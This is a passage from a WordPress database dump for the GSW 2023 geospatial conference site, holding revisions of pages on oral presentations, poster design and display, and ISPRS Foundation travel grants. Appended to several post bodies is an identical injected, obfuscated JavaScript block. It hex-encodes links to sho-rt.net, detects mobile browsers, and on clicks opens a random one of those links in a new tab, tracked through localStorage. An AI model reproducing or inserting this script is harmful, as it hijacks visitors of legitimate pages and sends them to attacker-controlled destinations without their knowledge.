ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','INSTRUCTIONS FOR ORAL PRESENTATIONS','','inherit','closed','closed','','5139-revision-v1','','','2023-08-13 18:12:33','2023-08-13 18:12:33','',5139,'https://gsw2023.com/?p=5142',0,'revision','',0),
(5143,1,'2023-08-13 18:26:38','2023-08-13 18:26:38','<span style=\"font-size: 12pt;\"><strong>Poster Design and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on arrival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 17:30 hours. Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Programme (soon to be announced)\r\nPlease remove your poster after 17:30 hours.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Poster Design and Presentation','','inherit','closed','closed','','5132-revision-v1','','','2023-08-13 18:26:38','2023-08-13 18:26:38','',5132,'https://gsw2023.com/?p=5143',0,'revision','',0),
(5144,1,'2023-08-13 18:33:51','2023-08-13 18:33:51','[vc_row][vc_column][bsf-info-box icon_size=\"32\" title_font_style=\"font-weight:bold;\"]\r\n<h5><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023</strong></h5>\r\nThe ISPRS Foundation (TIF) will be offering travel grants to deserving applicants, especially from developing countries, to participate in the <a href=\"https://gsw2023.com/\">Geospatial Week (Egypt GSW’2023)</a>, September 2023, Cairo, Egypt. Please note that The <a href=\"http://www.isprs.org/foundation/Default.aspx\">ISPRS Foundation</a> has limited amount of funds and therefore only limited number of grants will be offered. The following are the important dates for the applicants.\r\n\r\n&nbsp;\r\n<p style=\"margin-top: 0in; background: #F8F9FA;\"><strong><span lang=\"EN-CA\" style=\"font-size: 10.5pt; font-family: \'Open Sans\',sans-serif; color: #555555;\">TIF TRAVEL GRANT AWARDEES FOR GSW-2023</span></strong></p>\r\n<p style=\"margin-top: 0in; background: #F8F9FA;\"><span lang=\"EN-CA\" style=\"font-size: 10.5pt; font-family: \'Open Sans\',sans-serif; color: #555555;\">The ISPRS Foundation (TIF) announces the following list applicants as awardees to attend the Geospatial Week 2023 to be held in Cairo, Egypt during Sept. 2-7, 2023. TIF wishes them the very best. They will be informed about the granted amount by e-mail and would be receiving it and the certificate at the venue.</span></p>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 